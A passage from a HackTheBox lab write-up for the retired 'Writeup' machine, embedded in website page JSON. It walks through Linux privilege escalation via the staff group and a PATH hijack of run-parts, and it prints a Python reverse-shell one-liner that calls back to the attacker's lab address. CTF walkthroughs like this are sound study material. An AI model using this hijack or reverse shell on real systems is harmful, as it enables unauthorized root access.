operator\">=</span><span class=\"token number\">1000</span><span class=\"token punctuation\">(</span>jkr<span class=\"token punctuation\">)</span>,24<span class=\"token punctuation\">(</span>cdrom<span class=\"token punctuation\">)</span>,25<span class=\"token punctuation\">(</span>floppy<span class=\"token punctuation\">)</span>,29<span class=\"token punctuation\">(</span>audio<span class=\"token punctuation\">)</span>,30<span class=\"token punctuation\">(</span>dip<span class=\"token punctuation\">)</span>,44<span class=\"token punctuation\">(</span>video<span class=\"token punctuation\">)</span>,46<span class=\"token punctuation\">(</span>plugdev<span class=\"token punctuation\">)</span>,50<span class=\"token punctuation\">(</span>staff<span class=\"token punctuation\">)</span>,103<span class=\"token punctuation\">(</span>netdev<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Based on that result, I used the <code class=\"language-text\">find</code> command to look for writable targets owned by root whose group matched some of the groups that seemed interesting.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">find</span> / -user root -group jkr -ls -writable <span class=\"token operator\"><span class=\"token file-descriptor important\">2</span>></span>/dev/null\n$ <span class=\"token function\">find</span> / -user root -group staff -ls -writable <span class=\"token operator\"><span class=\"token file-descriptor important\">2</span>></span>/dev/null\n      <span class=\"token number\">189</span>      <span class=\"token number\">4</span> drwxrwsr-x   <span class=\"token number\">2</span> root     staff        <span class=\"token number\">4096</span> Jun  <span class=\"token number\">3</span>  <span class=\"token number\">2018</span> /var/local\n   <span class=\"token number\">131445</span>     <span class=\"token number\">20</span> drwx-wsr-x   <span class=\"token number\">2</span> root     staff       <span class=\"token number\">20480</span> Apr <span class=\"token number\">19</span>  <span class=\"token number\">2019</span> /usr/local/bin</code></pre></div>\n<p>The linpeas output also showed that <code class=\"language-text\">/usr/local/bin</code> had been added to <code class=\"language-text\">PATH</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 935px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e261019dc55192bfcb580d5bc8b1881a/eb390/image-20220811194949646.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 11.249999999999998%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAlElEQVQI1yXIuwqCYACAUV9ESTOv6a95K1qKMjREKNBcoqCwUVx7gt76K2g4y5EORUTTrdmUK8xFhhfHHOuU5pJyPqWEWYKfLfGSCEOEyLOAiRVgBwLHUdF1BVlWUJQ/qS7n3DtBsfPJty5jL/i8Ba+bT1v77DcuQx8yPl3aykTVTJLIpr9aDA+HKv/d1MC2TDRN4wvzNUMRBmIqSgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e261019dc55192bfcb580d5bc8b1881a/8ac56/image-20220811194949646.webp 240w,\n/static/e261019dc55192bfcb580d5bc8b1881a/d3be9/image-20220811194949646.webp 480w,\n/static/e261019dc55192bfcb580d5bc8b1881a/c7dd1/image-20220811194949646.webp 935w\"\n              sizes=\"(max-width: 935px) 100vw, 935px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e261019dc55192bfcb580d5bc8b1881a/8ff5a/image-20220811194949646.png 240w,\n/static/e261019dc55192bfcb580d5bc8b1881a/e85cb/image-20220811194949646.png 480w,\n/static/e261019dc55192bfcb580d5bc8b1881a/eb390/image-20220811194949646.png 935w\"\n            sizes=\"(max-width: 935px) 100vw, 935px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e261019dc55192bfcb580d5bc8b1881a/eb390/image-20220811194949646.png\"\n            alt=\"image-20220811194949646\"\n            title=\"image-20220811194949646\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>However, even looking at the pspy output, most commands specified binaries under <code class=\"language-text\">/usr/bin</code> and elsewhere using full paths.</p>\n<p>The only exception seemed to be <code class=\"language-text\">run-parts --lsbsysinit /etc/update-motd.d</code>, which was executed without a path when logging in over SSH.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sh</span> -c /usr/bin/env -i <span class=\"token assign-left variable\"><span class=\"token environment constant\">PATH</span></span><span class=\"token operator\">=</span>/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d <span class=\"token operator\">></span> /run/motd.dynamic.new</code></pre></div>\n<p>Because <code class=\"language-text\">PATH</code> included <code class=\"language-text\">/usr/local/bin</code>, I thought I should be able to execute arbitrary commands by writing a file containing my command there.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 625px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/34d3c66b27e846abad088d48e687a0cb/80d71/image-20220811200245367.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 17.083333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAs0lEQVQI1yXM23KCMACEYR/KAsM5QEhCQoiItoqO0/d/iL9AL3Z29mK/U/cKdGtA3AcaP6D8Dyo8UdOD8fsXbR1aSzrZHtG6xxhF2zZUVUldVyRxzPn8Rbz1ybyv2M+Cfk6YW8DNK+76wN/euGXFjv5ArDO4cTiAHZIb3nYNohHHLsviH+wvlj1y0vTbSdkJ5QJmvCAHz7zMWGtIkoRaVOR5RpalCFGTFzlpmlJsvYNRFPEHYcxtYg3LLcIAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/34d3c66b27e846abad088d48e687a0cb/8ac56/image-20220811200245367.webp 240w,\n/static/34d3c66b27e846abad088d48e687a0cb/d3be9/image-20220811200245367.webp 480w,\n/static/34d3c66b27e846abad088d48e687a0cb/487e2/image-20220811200245367.webp 625w\"\n              sizes=\"(max-width: 625px) 100vw, 625px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/34d3c66b27e846abad088d48e687a0cb/8ff5a/image-20220811200245367.png 240w,\n/static/34d3c66b27e846abad088d48e687a0cb/e85cb/image-20220811200245367.png 480w,\n/static/34d3c66b27e846abad088d48e687a0cb/80d71/image-20220811200245367.png 625w\"\n            sizes=\"(max-width: 625px) 100vw, 625px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/34d3c66b27e846abad088d48e687a0cb/80d71/image-20220811200245367.png\"\n            alt=\"image-20220811200245367\"\n            title=\"image-20220811200245367\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Normally on Linux, the earlier entries in <code class=\"language-text\">PATH</code> take precedence.</p>\n<p>However, for some reason, as long as <code class=\"language-text\">/usr/bin</code> was present in <code class=\"language-text\">PATH</code>, even placing <code class=\"language-text\">run-parts</code> in <code class=\"language-text\">/usr/local/bin</code> did not make it execute first.</p>\n<p>After checking various things, it turned out that when the following periodically executed task ran, the module I had placed in <code class=\"language-text\">/usr/local/bin</code> was deleted.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ /bin/sh -c /root/bin/cleanup.pl <span class=\"token operator\">></span>/dev/null <span class=\"token operator\"><span class=\"token file-descriptor important\">2</span>></span><span class=\"token file-descriptor important\">&amp;1</span></code></pre></div>\n<p>That seems to be why it did not run as expected.</p>\n<p>So I overwrote <code class=\"language-text\">run-parts</code> with the following command, then immediately made an SSH connection from another terminal, which gave me a root shell.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token builtin class-name\">echo</span> <span class=\"token string\">\"python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect<span class=\"token variable\"><span class=\"token punctuation\">((</span>\\\"<span class=\"token number\">10.10</span><span class=\"token number\">.14</span><span class=\"token number\">.4</span>\\\"<span class=\"token punctuation\">,</span><span class=\"token number\">4444</span><span class=\"token punctuation\">))</span></span>;os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(<span class=\"token entity\" title=\"\\&quot;\">\\\"</span>/bin/sh<span class=\"token entity\" title=\"\\&quot;\">\\\"</span>)'\"</span> <span class=\"token operator\">></span> /usr/local/sbin/run-parts<span class=\"token punctuation\">;</span> <span class=\"token function\">chmod</span> +x /usr/local/sbin/run-parts</code></pre></div>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>I think this machine had a lot to teach.</p>\n<p>It was especially educational regarding group and user permissions, which I had previously been handling more by intuition than understanding.</p>","fields":{"slug":"/hackthebox-linux-writeup-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-08-10","description":"A writeup of the retired HackTheBox machine \"Writeup\".","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Writeup (Easy/Linux)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-writeup-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}